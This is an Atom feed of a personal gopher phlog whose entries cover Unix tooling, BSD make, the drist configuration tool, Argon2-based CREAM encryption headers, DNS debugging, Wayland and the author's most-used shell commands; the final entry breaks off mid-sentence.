<?xml version="1.0" encoding="UTF-8" ?>
<feed xmlns="http://www.w3.org/2005/Atom">
 <title type="text">z3bra.org phlog</title>
 <subtitle type="text">Proudly powered by smtpd(1)</subtitle>
 <id>gopher://phlog.z3bra.org/h/atom.xml</id>
 <link href="gopher://phlog.z3bra.org/h/atom.xml" rel="self" />
 <link href="gopher://phlog.z3bra.org/1/" />
 <updated>2024-05-05T02:40:32+02:00</updated>
<entry>

              <title><![CDATA[BitTorrent specification v2]]></title>

              <id>gopher://phlog.z3bra.org/0/bittorrent-specification-v2.txt</id>

              <link href="gopher://phlog.z3bra.org/0/bittorrent-specification-v2.txt" />

              <updated>2020-09-08T21:22:00+02:00</updated>

              <author><name>wgs</name></author>

              <content type="text"><![CDATA[                                          BitTorrent specification v2
──────────────────────────────────────────────────────────────────────
Libtorrent recently released their work on the bittorrent v2 spec [0].

Given their widespread usage, it will certainly help adoption of the spec
in other clients !

This could be a good time for me to blow the dust out of libeech [1], my
Bittorrent library that was never finished, and apply some of the idioms
I recently learnt.

Maybe it will reach a usable state someday ?
--
~wgs

[0]: https://blog.libtorrent.org/2020/09/bittorrent-v2
[1]: git://z3bra.org/libeech.git

20200908.2122]]></content>

              </entry>
<entry>

              <title><![CDATA[Broader protocol support for TWTXT]]></title>

              <id>gopher://phlog.z3bra.org/0/broader-protocol-support-for-twtxt.txt</id>

              <link href="gopher://phlog.z3bra.org/0/broader-protocol-support-for-twtxt.txt" />

              <updated>2020-10-21T22:49:00+02:00</updated>

              <author><name>wgs</name></author>

              <content type="text"><![CDATA[                                   Broader protocol support for TWTXT
──────────────────────────────────────────────────────────────────────
I found recently a microblogging platform: twtxt [0].

It's main selling point is that it's decentralized and minimalist. The
concept is simple: write your thoughts in a plain text file, one per
line, prefixed with the date, and share it with others [1] :

2020-10-21T21:34:47+02:00        I am trying twtxt!197
1970-01-01T00:00:00+00:00        It's a Unix system!

You « follow » people by fetching their twtxt.txt file periodically,
and display all entries sorted by date. Multiple clients exist, and the
format is simple enough to build a working client in a few minutes.

Once your file is updated, you must share it with other users. There is
a myriad of network protocols that can be used for this purpose: gopher
of course, but also gemini, IMAP,  FTP, SSH, SMB, WebDav, ... Heck,
even HTTP !

However as I've found out after a few days of using it, all clients and
user directories (registry.twtxt.org, twtxt.tilde.institute, twtxt,xyz,
..) only support HTTP links. This doesn't really fit the « built for
hackers », and « minimalist » promise from the description.

I love the simplicity of the specification. All it does is specifying a
format for people to share thoughts around the world, in the most
elegant way possible: plain text. This leaves the door open to so many
ways to share and update this file, and enforcing the use of HTTP on
its users can only deserve it. The gopher amd gemini community are
particularly aware of the beauty of plain text, and twtxt totally fits
this universe, so I think it would clearly be a benefit to just not
exclude them.

This post is a call to developers to add more protocol support to their
twtxt clients. Not everyone is running an HTTP server, or wants to.

Let's make twtxt truly decentralized, and open !
--
~wgs

PS: I would like to say « thank you » to vain [2][3] for being the
first person ever to follow, and metion my name on twtxt, thus proving
that it's possible !

[0]: https://twtxt.readthedocs.io
[1]: gopher://g.nixers.net/0/~z3bra/twtxt.txt
[2]: gopher://uninformativ.de
[3]: https://www.uninformativ.de/twtxt.txt
20201021.2249]]></content>

              </entry>
<entry>

              <title><![CDATA[BSD make and built-in rules]]></title>

              <id>gopher://phlog.z3bra.org/0/bsd-make-and-builtin-rules.txt</id>

              <link href="gopher://phlog.z3bra.org/0/bsd-make-and-builtin-rules.txt" />

              <updated>2020-09-09T18:44:00+02:00</updated>

              <author><name>wgs</name></author>

              <content type="text"><![CDATA[                                          BSD make and built-in rules
──────────────────────────────────────────────────────────────────────
I just realized a specificity of BSD makefile: there is no built-in
rule to link a program for which you specify the object
prerequesties.

Take the following makefile, BSD make will automatically compile it
as expected:

       $ more -e makefile
       pgm: pgm.c

       $ make
       cc -O2 -pipe    -o pgm pgm.c

Now try to make it generate an object file (the second line could be
infered by make, but I added it for clarity):

       $ more -e makefile
       pgm: pgm.o
       pgm.o: pgm.c

       $ make
       cc -O2 -pipe   -c pgm.c

The target "pgm" is NOT generated !

This is actually what the POSIX spec for make specifies [0].
There is no built-in rule to build a target from a .o file, only
from a .c file. And if you think about it, it make sense, because a
single suffix rule to turn a .o into a binary would only work if you
binary doesn't link multiple objects. so you'd better avoid creating
the object file in this case, and use the .c rule…

It means that when a binary must be built out of multiple object
files, you have to specify the target rule:

       pgm: pgm.o util.o
               $(CC) $(LDFLAGS) -o $@ pgm.o util.o

I guess I'll be rewriting makefiles in the next few days…
--
~wgs

[0]: https://pubs.opengroup.org/onlinepubs/009695399/utilities/make.html#tag_04_84_13_08

20200909.1844]]></content>

              </entry>
<entry>

              <title><![CDATA[Configuration management]]></title>

              <id>gopher://phlog.z3bra.org/0/configuration-management.txt</id>

              <link href="gopher://phlog.z3bra.org/0/configuration-management.txt" />

              <updated>2020-08-24T11:32:00+02:00</updated>

              <author><name>wgs</name></author>

              <content type="text"><![CDATA[                                             Configuration management
──────────────────────────────────────────────────────────────────────

Automation.

This is a fairly vast topic, so let's start from the beginning.

# Principles

The first thing to do after setting up a server is configuring it,
and then the services that it will run.

This includes the following:

- Nameservers
- Installed packages
- Running services
- Service configurations
- …

Performing these configurations (in their simplest form) means creating
files on the server, and running specific commands.

Many tools are available to automate this process:

- [ansible][0]
- [puppet][1]
- [chef][2]
- …

Each of them have their own strengths, and a declarative language used
to describe the server state.
All of them need you to learn a new DSL, and a new language to perform
the task you would expect.

There has to be a simpler way.

As a sysadmin, and long-time Linux and BSD user, the language I'm the
most familiar with is the shell.
And as you certainly guessed, there is a tool for that !

# drist(1)

By relying only on ssh(1) and rsync(1), [drist][3] is the simplest
configuration management tool I know of.

It works in a centralized fashion. You first create a module on the
deployment machine:

       gopherhole/
       ├── files/var/gopher/index.gph
       └── script

The script file may contain whatever is needed to configure the service:

       #!/bin/sh
       pkg_add geomyidae
       rcctl enable geomyidae
       rcctl start geomyidae

Then you apply the module on your server with:

       cd webserver
       drist -ps [email protected]

Everything in `files` will be uploaded on the server "as-is". Once all
files are deployed, the `script` file will be uploaded, executed over
ssh(1), and then deleted.

All you need is an ssh connection to your server!

Per-server configuration files can be uploaded by naming the `files`
directory as `files-FQDN`. These files will then be uploaded only to
the server who's FQDN match the directory name.

# Rationale

I love simple tools.

Over the years, I got to use both chef and puppet in entreprise-grade
environments.
They work well for environments with thousands of servers,
and their greatest advantage is that they provide a client/server
configuration. Thus, centralization is built-in and makes it great to
work in a team.

Over the years I built a few servers to host various services, like
emails, httpd, gopher, git, … Whatever.
Setting up these servers is fun, but at some point I lost track of
everything I did. At first I wanted to document it all, but documentation
is doomed to lack behind at some point, so I figured the best way to
"document" it would be to automate the whole configuration, so replicating
it would only be a matter of commands I can easily read, and run again
when needed.

This is where drist(1) comes into play. By being a shell-first citizen,
and simply being a local mirror for your configuration files, it becomes
fairly easy to understand what it does.

In the past few monthes, I'm slowly been migrating all my server
configuration to drist, and ensuring that I could apply any module at
any time without breaking anything. Some notable modules I made are

- gopherhole - publish notes in my gopher hole
- acme - check/update let's encrypt certificates
- ssh_keys - deploy my SSH keys
- syspatch - path/upgrade OpenBSD servers

Configurations have never been so quick & easy !

[0]: https://ansible.com
[1]: https://puppet.com
[2]: https://chef.io
[3]: gopher://dataswamp.org/0/~solene/article-drist-intro.txt

20200824.1132]]></content>

              </entry>
<entry>

              <title><![CDATA[CREAM header for encrypted streams]]></title>

              <id>gopher://phlog.z3bra.org/0/cream-header-for-encrypted-streams.txt</id>

              <link href="gopher://phlog.z3bra.org/0/cream-header-for-encrypted-streams.txt" />

              <updated>2022-10-24T14:15:00+02:00</updated>

              <author><name>wgs</name></author>

              <content type="text"><![CDATA[                                   CREAM header for encrypted streams
──────────────────────────────────────────────────────────────────────
Symmetric encryption is a crypto algorithm where the same key is used to
encrypt _and_ decrypt data. As opposed to asymmetric encryption, where
there are two keys: one to encrypt, and the other to decrypt data.

While this sounds more convenient because there is only one key to
manage, symmetric crypto comes with a complex challenge: sharing the key
with the other party.
Whoever has the key can decipher the message, so extra care should be
taken when sharing it with anyone. There are many ways to securely share
a key, and one of them is to use Key derivation functions, or KDF.

Key Derivation Function (KDF)
-----------------------------

The idea behind this method is that, rather than sharing the actual key,
the other party should be capable of recreating it, based on a secret
value known to both parties (a passphrase for example). There are many
algorithms to choose from for this purpose, but the best solution as of
today (late 2022), is the Argon2[0] algorithm.

Argon2 is well suited for this purpose, because it maximize the cost it
takes to an attacker to recreate the key from a secret, making
brute-force attack a non-viable solution.

The algorithm takes multiple parameters into account:

- Secret - the password to generate a key from)
- Salt - Arbitrary data used to randomize key output
- Memory cost - how much memory is needed to compute the key
- Time cost - how many times to pass over that memory
- Parallelism - how many concurrent threads to use

If you change one of these parameters, the resulting key will be totally
different. This means that all these parameters must be known to both
parties for the encrypted conversation to happen.

While the secret must be kept, well..., secret, hiding the other
parameters is not needed at all. For convenience, they can thus be
shared directly with the ciphertext, so the person decrypting it only
has to know the secret.

CREAM header
------------

This is where the CREAM header shimes in. Its sole purpose is to provide
all these parameters to the decryption side in a compact header, to help
with key derivation.

Version 1.0 of the header is made specifically for Argon2:

 +-------+-------+------+------+----+-----------+----+
 |CREAM\1|VERSION|BLKSIZ|MEMORY|TIME|PARALLELISM|SALT|
 +-------+-------+------+------+----+-----------+----+

Full header size is 40 bytes, and includes all the information needed to
decipher the data appended to it.
For more details, take a look at the cream(5)[1] manual page.

Because it is prepended to the data, the payload (encrypted data) can be
of any size, which allow encrypted streams of any size.

I've implemented this format in the cream[2] utility, as a reference
implementation, as well as in my personal secret manager, safe[3].
--
~wgs

[0]: gopher://z3bra.org/d/notes/argon2.pdf
[1]: gopher://z3bra.org/0/man/cream.5
[2]: gopher://z3bra.org/0/projects/cream.txt
[3]: gopher://z3bra.org/0/projects/safe.txt

20221024.1415]]></content>

              </entry>
<entry>

              <title><![CDATA[Debugging DNS propagation]]></title>

              <id>gopher://phlog.z3bra.org/0/debugging-dns-propagation.txt</id>

              <link href="gopher://phlog.z3bra.org/0/debugging-dns-propagation.txt" />

              <updated>2020-09-19T15:20:00+02:00</updated>

              <author><name>wgs</name></author>

              <content type="text"><![CDATA[                                            Debugging DNS propagation
──────────────────────────────────────────────────────────────────────


I recently made a subdomain for phroxy(1), my http to gopher proxy [0].
In the process, I realised I had a resolution issue when accessing it
(even after ,72 hours). Sometimes I could access the domain, sometimes
I couldn't. At the time I used some random DNS, so I tried to resolve
them directly at the source (my own DNS servers), and it resolved as
expected... Weird issue.

I tried a bunch of DNS propagation maps on the web, and it showed that
barely 20% of worldwide servers could resolve this specific name, while
resolving another, old name on the same machine hit 100% resolution.
I first though about the sequence number, but it was correctly updated
(I even incremented it again, to be sure).

Then a collegue of mine gave me the key to this problem:

   dig +trace phroxy.z3bra.org

That `+trace` here is the key. It show which servers are contacted to
resolved your name, kind of like what traceroute does for ICMP. And it
would never reach the servers pointed to by the NS records of my zone.
So my zone was fucked up somewhere, in a way that prevented the DNS
servers to be selected as authoritative on the zone.

After taking a closer look at the zone, I found the issue, in the very
first line:

   $ORIGIN rg.

The full domain was cropped! It should have read « $ORIGIN z3bra.org.
». As I use short domain names in my zone, the $ORIGIN is there to
complete the FQDN, and it wasn't doing  it with the correct domain !

I fixed that line, incremented the seqnum, and deployed the zone again.
Problem solved.

The real game-changer for me was `dig +trace`. I never used it before,
but it's definitely going to my debugging toolbelt !
--
~wgs

[0]: git://z3bra.org/phroxy.git

20200919.1520]]></content>

              </entry>
<entry>

              <title><![CDATA[Email blogging with scribo(1)]]></title>

              <id>gopher://phlog.z3bra.org/0/email-blogging-with-scribo1.txt</id>

              <link href="gopher://phlog.z3bra.org/0/email-blogging-with-scribo1.txt" />

              <updated>2020-09-08T15:44:00+02:00</updated>

              <author><name>wgs</name></author>

              <content type="text"><![CDATA[                                        Email blogging with scribo(1)
──────────────────────────────────────────────────────────────────────
We had a discussion with prx [0] a while ago about blogging through
emails.

The idea is simple: send an email to a specific address, and the blog
entry is automatically added to your log.

A mail client is all you need to share your content!

So we had this idea, and I honestly totally forgot about it, until
recently. prx effectively released such a tool, under the cool name of
"prose" [1].

I found it so cool that I had to give it a shot!

       git://z3bra.org/scribo.git

It is still in its early stage, and I barely got something working.

BUT IT WORKS !

I added the following to my /etc/mail/aliases:

       [email protected]    |/usr/local/bin/scribo -o index.gph

Whenever I receive a mail at this address, it creates a log entry and
generate the index file in a specific directory, owned by user _smtpd.

Every 5 minute, a cron job rsync(1) the whole directory to my gopher
server, for sweet publishing of content (my mail and gopher servers are
different machines, making that setup a little bit more complex).

To ensure that only I can publish notes, there is a verification on all
incoming emails of the From: field, ensuring the a sender is indeed me.

I'll only be trying it for a while, and if it works, I'll make it
available in /phlog on this server.

Stay tuned !
--
~wgs

[0]: https://prx.ybad.name
[1]: https://ybad.name/Logiciel-libre/Code/C/prose.html


20200908.1544]]></content>

              </entry>
<entry>

              <title><![CDATA[Gopher text rendering ideas]]></title>

              <id>gopher://phlog.z3bra.org/0/gopher-text-rendering-ideas.txt</id>

              <link href="gopher://phlog.z3bra.org/0/gopher-text-rendering-ideas.txt" />

              <updated>2020-09-23T17:22:00+02:00</updated>

              <author><name>wgs</name></author>

              <content type="text"><![CDATA[                                          Gopher text rendering ideas
──────────────────────────────────────────────────────────────────────

TL;DR: I would like to try a gopher client using monospaced and
proportional fonts.

Gopher is a text-based protocol, and as such is mainly used to share
text files.

Plain text doesn't come with any formating, like what HTML of or LaTeX
would provide. As such, gophernauts assume all clients use at least a
70 char wide display, and a monospace font.
If you take this paragraph, there is absolutely no added value for it
to wrap at 70 characters. Proportional fonts are usually more pleasant
to read. They're also more compact, meaning you can fit more text on a
page.

However, you need a monospaced font so this cute zebra doesn't look
like a gull:

             ,,
      ______/ ¨/)
  *~'(///////
      ||   ||
      ""   ""

This make use of a technique called "preformatted text".

So I had an idea. What if a client used proportional font for text
blocks, and monospace for preformatted text ?

You would need a way to figure out what is preformatted, what is raw
text, and find the delimitation between both.

The delimitation is easy. It's the same as with paragraphs: a new line.
Whenever there is a new line character on its own, it means you get to
start a new paragraph.

Now what could be the difference between raw, and preformatted text ? I
though about it, and I think that the main difference is the use of
white spaces.
When you write text, you really only need to put one space between
words (maybe two after a sentence).
However, with preformatted space, you (almost) always have to use
whitespaces for formatatting. Be it to draw ascii art, or align stuff.
Which means that you're very likely to find multiple whitespaces glued
together.

So how would that work ?

The client would read the text data from the server, and buffer the
input (that's mandatory!). You would need to buffer at  least one
paragraph, so buffer until you read 2 sequences of CRLF (or LF).
Now you got a full paragraph. You can check inside for multiple
occurences of the whitespaces, say at least 3 in a row.

If you find 3 whitespaces, the the paragraph is "preformatted". You
would then display it using a monospaced font. For anything else, use a
proportional font.

This is a pretty naive approach, yet it seems simple enough to work.
I'll see if I can get something working, and see how it goes.
--
~wgs

20200923.1722]]></content>

              </entry>
<entry>

              <title><![CDATA[Happy time_t party!]]></title>

              <id>gopher://phlog.z3bra.org/0/happy-timet-party.txt</id>

              <link href="gopher://phlog.z3bra.org/0/happy-timet-party.txt" />

              <updated>2020-09-13T12:26:00+02:00</updated>

              <author><name>wgs</name></author>

              <content type="text"><![CDATA[                                                  Happy time_t party!
──────────────────────────────────────────────────────────────────────

Today is a special event in the Unix timestamp history.

At 12:26:40 UTC, on september de 13th of 2020, the timestamp reached
1600000000. Next major event will be in 3 years, for the next round
number, so see you there !
--
~wgs

20200913.1226]]></content>

              </entry>
<entry>

              <title><![CDATA[IDEA: multipart/mixed support for scribo]]></title>

              <id>gopher://phlog.z3bra.org/0/idea-multipartmixed-support-for-scribo.txt</id>

              <link href="gopher://phlog.z3bra.org/0/idea-multipartmixed-support-for-scribo.txt" />

              <updated>2020-10-06T17:42:00+02:00</updated>

              <author><name>wgs</name></author>

              <content type="text"><![CDATA[                             IDEA: multipart/mixed support for scribo
──────────────────────────────────────────────────────────────────────

I am writing this post from my phone, somewhere in the Reunion islands.
This place is beautiful, majestic ! I crossed mountains one day, dove
in corals the next day, eating delicious food and meeting even more
delicious people.

I've been away from a computer for the last 2 weeks, and as such didn't
work or played with anything technical I could share on this phlog.
However, I still did some stuff worth sharing, because this island is
so beautiful.

Unfortunately, my phlogging « engine », scribo(1), which converts
emails to phlog entries only accept text/plain mimetypes. I figured
this would be sufficient, given that gopher is a text-oriented
protocol. However, I realize here that I would like to share more than
just plain text. At least pictures. So I think the next improvement to
scribo would be supporting images/* mimetypes, first as an entry of
their own, using the subject as a legend, and then support for, maybe,
multipart/mixed, so I could send text with images, and reference them.
I'll have to read about the RFC a bit to know how that works, but that
could definitely be a great improvement. At least it would fill the gap
I'm missing today...

In the mean time, I'll upload some pics manually from my phone (thanks
sailfishos that I can use rsync(1) natively!), so I can share them here.

Peace, love, phlog 💋
--
~wgs

20201006.1742]]></content>

              </entry>
<entry>

              <title><![CDATA[I'm on Lemmy now!]]></title>

              <id>gopher://phlog.z3bra.org/0/im-on-lemmy-now.txt</id>

              <link href="gopher://phlog.z3bra.org/0/im-on-lemmy-now.txt" />

              <updated>2023-07-05T21:38:00+02:00</updated>

              <author><name>wgs</name></author>

              <content type="text"><![CDATA[                                                    I'm on Lemmy now!
──────────────────────────────────────────────────────────────────────

Following reddit's decision to monetize their public API, I decided to
simply get off the platform. I'm however a fervent lurker, and love to
mindlessly scroll through links and memes posted by random people.
Hopefully for me, a bunch of nerds were already working on a
decentralized link aggregator: Lemmy[0] (see also kbin[1]).

It's a link aggregator one can self-host, but which can talk to other
software involved in the « Fediverse ». Long story short, all servers
can communicate together, and with an account created on website A, you
can read, post and comment on website B. Many software use this
principle of federation, starting with emails (but also Mastodon,
Matrix, …).

Because of reddit's fuckery, the « Lemmyverse » exploded, and saw a
massive amount of users looking for a better land to post memes (and
I'm definitely one of them).

I decided to join through the SDF instance[1], as it's the community I
feel closest to because of their interest in reviving old techs! I
never had the occasion to create an account there because I already
selfhost my own website, gopherhole and every other service they
propose, but this time I have not interest (yet) in running my own
Lemmy instance, so it's the perfect time to be one of them, yay!

You can now contact me on lemmy as @[email protected][3], see you there!
--
~wgs

[0]: https://join-lemmy.org
[1]: https://kbin.pub
[2]: https://lemmy.sdf.org
[3]: https://lemmy.sdf.org/u/wgs


20230705.2138]]></content>

              </entry>
<entry>

              <title><![CDATA[KVM switches for the desktop]]></title>

              <id>gopher://phlog.z3bra.org/0/kvm-switches-for-the-desktop.txt</id>

              <link href="gopher://phlog.z3bra.org/0/kvm-switches-for-the-desktop.txt" />

              <updated>2020-12-16T04:50:00+01:00</updated>

              <author><name>wgs</name></author>

              <content type="text"><![CDATA[                                         KVM switches for the desktop
──────────────────────────────────────────────────────────────────────
Wether we want it or not, the 2020 pandemic changed the way the
industry works. For me, it meant working remotely 90% of the time. I
could bring my company's docking station, screen and laptop home, to
work from here. This sounded cool until I realized how small my « desk
» really is [0] ...

On this desk are connected my personnal computer (tower build), work
laptop (docked) and a PS4. I can fit them all on this desk ! Hooray !
What's tedious though, is switching between them. Let's cconsider 2 use
cases:

- Switching from my tower to PS4
- Switching from my tower to the laptop


So here I am, chatting on IRC or browsing the gopher space on my
computer, when a friend calls me up to play video games. It takes quite
a few steps:

1 - Turn on the PS4 using the  controller
2 - Plug in my headphones to the controller
3 - Switch monitor input to HDMI
4 - Replug the mouse from my tower to the PS4
5 - Plug a new keyboard to the PS4

And I'm set ! A few explanations here. I must plug headphones to the
controller because the PS4 only has 2 USB ports, which I use for
keyboard and mouse. And as my monitor doesn't have speakers, I must use
the controller for sound output.
I use another keyboard rather than the currently plugged in to avoid
having to unplug 2 devices from my tower. It's more "convenient". When
I'm done, I just put it away. When switching back to my tower, I just
do the same tasks in reverse.


Now, here is my « working commute » (switching from tower to work
laptop) :

1 - Turn on/wake up laptop from the dock
2 - Switch monitor input to Display port
3 - Turn on the wireless mouse
4 - Swap cable connected to my keyboard

This is a bit simpler. I use a wireless mouse plugged to the dock so I
don't have to swap my main mouse which is plugged behind my desk, and
thus hard to reach. Same goes for the keyboard, which is why I have two
cables that I can plug to the keyboard to « switch » computers. So
switching between my tower and work laptop doesn't require going under
the desk, Yay !



You certainly understand how tedious this is, and when I heard that we
might eventually keep working remotely for a few more months, I decided
it was the time to optimize that workflow. That's when I bought a KVM
switch, which stands for « Keyboard, Video, Mouse switch » [1].

It's a device that lets you connect your KVM devices to different
computers, and switch them using a simple button press. I bought one
with 4 inputs, with HDMI support. Its main advantage is its
compactness, and that plugs are packed on only 2 sides, helping with
cable management.

Since I have this device, switching between my 3 computers is as simple
as pressing a button ! I use the same mouse/keyboard everytime, which
is much more comfortable as well.

I though that KVM switches were a datacenter thing. Nope, and I wonder
how I did without it all these years !
--
~wgs

[0]: gopher://z3bra.org/I/u/tiny_desk.jpg
[1]: gopher://z3bra.org/I/u/kvm_switch.jpg

20201216.0450]]></content>

              </entry>
<entry>

              <title><![CDATA[My love-hate relationship with Wayland]]></title>

              <id>gopher://phlog.z3bra.org/0/my-love-hate-relationship-with-wayland.txt</id>

              <link href="gopher://phlog.z3bra.org/0/my-love-hate-relationship-with-wayland.txt" />

              <updated>2020-11-06T17:28:00+01:00</updated>

              <author><name>wgs</name></author>

              <content type="text"><![CDATA[                               My love-hate relationship with Wayland
──────────────────────────────────────────────────────────────────────
# The X windowing system, and me

It took me years to come up with the X11 setup I currently have. I had
to learn Xlib and XCB programming in the process, because I wanted an
experience so sweet an tailored to my needs that I wrote a shitload
of tools [0][1][2][3][4], just for the sake of learning how the
venerable
X.org server works internally.
I learnt a lot of stuff in the process. About the X protocol and
libraries, of course, but not only.
Because of the complexity of its interface and architecture (I'm not
saying this in a pejorative way!), I had to learn how to read the
documentation (XCB ? Documentation ?), understand its inner concepts,
organize my code better and force myself into a discipline I didn't
have before.

Building programs for my X environment also helped me think about what
I need to feel comfortable when using my computer. What makes my
workflow
more fluid, or what slows me down.
I quickly realized that tiling window managers were not for me for
example, and that I need a quick way to move windows at to opposite side
of the monitor, in a different size. That why cwm(1) quickly became my
best friend for managing windows. When I wrote glazier [3] later, I use
cwm as my model, and ended up creating a somehow stripped down version
of it, on top of XCB rather than Xlib !


Then came Wayland.

[0]: https://github.com/wmutils/core
[1]: https://github.com/wmutils/opt
[2]: git://git.z3bra.org/xmenu.git
[3]: https://z3bra.org/glazier
[4]: https://z3bra.org/man/ewmh

# Wayland, take one (2014)

I really heard about Wayland a few years ago, back when I was
discovering
Linux, and especially aesthetics of a Linux desktop. At the time, I was
trying hard to make my desktop look good to me, and was spending much
more time "improving" my workflow, rather than doing any real work.
It was pretty fun though, and helped me get into the deepest corners of
my operating system configuration, including replacing the init system
just so my "ps" output could fit on a single terminal page !

During my explorations, I stumbled upon a video showcasing a 3D Wayland
compositor [5]. The video shows a 3D where the user navigates like in
an FPS game, put application windows on the walls, and navigate between
them by "walking around" the desktop.

THAT WAS SO COOL ! So I looked into this "Wayland" thing, and discovered
that this was a competitor to the well-known X server, which I was still
experimenting with, but was slowly starting to show its limits in terms
of customisability.

I read the Wayland introductory post, and started looking into how I
could test it out, and what could be *actually* done with it. And as it
turned out… Not much.

Back in the days (around 2014), the only "viable" option was to use
weston, a compositor made to showcase Wayland, rather than do any actual
work. It featured a terminal (weston-terminal), but that's pretty much
it. You couldn't even get a web browser running, so that was FAR from
usable. I wanted to do customizations, tuning, modifications, try new
concepts… Not feel stuck in a totally meaningless desktop environment.

And so I did what every IT hobbyist does in the Unix world when a new
technology appears to "replace" and older one: join the hate bandwagon !

It was pretty easy to hate it at that time. It was advertising as the
new
challenger, yet nobody adopted it, there was nothing useful made out of
it, and the only "documentation" was the code of the single, useless,
application available: weston.
I remember trying to look at that code and was so horified that it
reinforced my hate against it. It was at that time that I decided that
X.org wasn't going anywhere, and that I could invest some more time to
learn how it works internally and start making software for it. We (dcat
and I) came up with wmutils [0], which is to this day the most "famous"
software I wrote, even though it targets a small niche.

[5]: https://youtu.be/_FjuPn7MXMs

# The Plan9 operating system

Years were passing and I stopped caring about how my desktop *look*,
to concentrate on what I could *do* with it. I started contributing to
more meaningful software, to perform data deduplication [6] for backing
up my family pictures, securely storing my passwords [7] and so on…

I also started looking into other operating systems, mostly OpenBSD
(which powers all my servers!), and Plan9.

Plan9 was a fascinating discovery at the time. The system was so
elegant,
and consistent that even OpenBSD looked messy compared to it (not even
mentioning Linux !).
Since I discovered it, I've been admirative about it, without ever
giving
it a try. Not even plan9ports ! I've however read the research paper
quite a few times, and integrated some concepts in my day-to-day
computer usage, like embracing the mouse for the correct use cases,
rather than being a "TILING WM FTW, LUV KEEB, MOUSE SUCKS LOL" kind
of guy.

[6]: git://git.2f30.org/dedup.git
[7]: https://z3bra.org/safe

# Wayland, take two (2019)

A couple years passed, and I started hearing about Wayland more and
more. There was this guy who created a simple WM for wayland, "swc",
and everyone was so enthusiastic about it!

This was the first time I heard about someone doing ACTUAL work for
Wayland. Of course I heard about GTK and Qt providing bindings for it,
but it didn't really interest me. This new window manager, however,
was the proof that real work was starting on Wayland. Then came "sway",
the compositor meant to be the i3 window manager for wayland. Later on,
a new library named "wlroots" came out of it, and started gaining
widespread usage.
I was hearing more and more people succesfully "switching to wayland
for the desktop", and I started being curious again. I looked into some
Wayland articles here and there, out of curiosity rather than from
real interest…

Then Drew Devault, the creator of the famous "wlroots" library posted
this article:

https://drewdevault.com/2019/05/01/Announcing-wio.html

It was announcing the initial release of "wio", a wayland compositor
replicating the rio(1) window manager from Plan9. THAT WAS SO COOL !
I read about rio multiple times when looking at Plan9, and tried to
replicate its usage under X multiple time, in vain. And this guy come
up with a Wayland compositor doing exactly that ?
This was the time for me to stop hating on Wayland, and actually look
into it. I started reading about it as a protocol, as a library, how it
differs from the X server, and why this is a good thing.

To be totally honest. I didn't understand. It was still to complex for
me to understand, and I started hating it again, this time for a *real*
reason: I could not understand it. From the other feedbacks I had,
many stuff were still imprecise and not working. Most people on wayland
had to resort to "Xwayland", that could let them run X software under
wayland. It felt hacky, and I decided I didn't want wayland anymore.


# Crux, OpenBSD and the lost drives

By the end of 2019, I bought myself an SSD for my workstation, deciding
that recycling old hard drives was great for the planet, but not so
for my sanity. Reinstalling your OS often because your drives fail is
good for practicing and cleaning up, but it gets boring over time and
cleaning up, but it's boring at some point.
When I got that SSD, I decided to try OpenBSD as a workstation, and
slapped it on my SSD real quick. I was happy, until I realized that I
could not mount my existing /home and /var/data partitions, because
I used LVM for partitionning my 1Tib harddrive, which stores all my
data. That's how the SSD took dust.

By the end of the year, a pandemic known as Covid-19 stroke the whole
world, and eventually resulted in a full country lockdown in march 2020.

This left me with a lot of time on my hands to eventually do stuff that
were on my TODO for a while, which includes setup up a good backup
system
for my data. That's fortunate because a few weeks later, my 1Tb drive
died spectacularly, taking with it all my data, and /home partition.

That's only a few month later that I replaced this failed drive. This
time I decided to go for a filesystem I could use on both Linux and
OpenBSD, that is, well, nothing actually.

The only common filesystems between Linux and OpenBSD are FAT32 and
ext2,
which I didn't want to use at all. I then gave up on OpenBSD, and
decided
to reinstall my current OS, Crux [8] on the SSD, when I have some time.

[8]: https://crux.nu

# Wayland, take three (2020)

Tech news come in waves. You do not hear about something for months
or years, and all of the sudden, everyone is debating it !
This is true for Wayland, up to the point I read a post about X.org
being tagged as "abandonware" [9]. This article made a lot of noise in
the wayland community and got many replies [10][11][12][13].
These discussions convinced me that Wayland was now usable, and I
decided
to look into it. Again.

And so did I…


[9]:
https://www.phoronix.com/scan.php?page=news_item&px=XServer-Abandonware
[10]: https://lobste.rs/s/vqv6nu/it_s_time_admit_it_x_org_server_is
[11]: https://ajaxnwnk.blogspot.com/2020/10/on-abandoning-x-server.html
[12]: https://lobste.rs/s/qtplaa/on_abandoning_x_server
[13]: https://arewewaylandyet.com

# Crux and the X-less ports

As of november 2020, we're going for a lockdown again, as the (in)famous
"second wave" of Covid-19 strikes again. As I get to spend more time
home,
I decided to reinstall Crux on the SSD, with a special twist this time:

The X server won't be installed at all !

This will force myself into embracing and understanding Wayland if I
want to use my computer. As time passes by, I'll certainly hit some
shortcomings of wayland, but I'm decided to actively participate in its
deployment this time !

I gave Wayland a quick try first (using X11 as the backend), to make
sure
that the software I planned on using (wio, cage, alacritty and firefox)
were usable under wayland), and started porting them on crux.
I made myself a "wayland" port tree, and started looking into what is
needed for running wayland natively on my desktop.

I'll be documenting what I find along the way, and collect thoughs on
my findings. You'll find them on my gopher hole, under /notes/wayland,
along with this "introduction".

As a conclusion, I'll say this:

Only fools never change their minds. Don't hate on a technology just
because you don't see the point, or don't understand it, because you
might embrace it later on.
Unless it's systemd. It just plain sucks.

Be happy, stay cool, and contribute ! ☮️


20201106.1728]]></content>

              </entry>
<entry>

              <title><![CDATA[My top 10 commands]]></title>

              <id>gopher://phlog.z3bra.org/0/my-top-10-commands.txt</id>

              <link href="gopher://phlog.z3bra.org/0/my-top-10-commands.txt" />

              <updated>2020-10-27T23:36:00+01:00</updated>

              <author><name>wgs</name></author>

              <content type="text"><![CDATA[                                                   My top 10 commands
──────────────────────────────────────────────────────────────────────
“Show me what you type and I'll tell you who you are„

This week, my shell command history hit 10000 lines ! To celebrate, I
decided to check what are the 10 commands I use the most:

   $ history|awk '{print $2}'|sort|uniq -c|sort -rn|head -n 10
   1550 v
   1492 ll
   870 make
   787 cd
   503 git
   426 pwd
   372 fg
   245 ssh
   206 doas
   192 man

1. v (alias « vis »)

Fortunately, I was smart enough to alias my most used command to a
single letter ! "v" is an alias for "vis", my text editor of choice. I
use my computer mostly for programming, and editing server configs, and
the fact my editor is the first command of the list proves it ! Nothing
really interesting here after all...

2. ll (alias « ls -l »)

If I could only have a single-key keyboard, then I'll pick the « L »
as the only letter. I call this one my stress-ball. Whenever I think or
need to relieve stress, I type « LL <enter> », immediately followed
by « <control> L » to clear the screen, so I can run « LL » again.

3. make

Now this is getting interesting ! Do I do this much C programming that
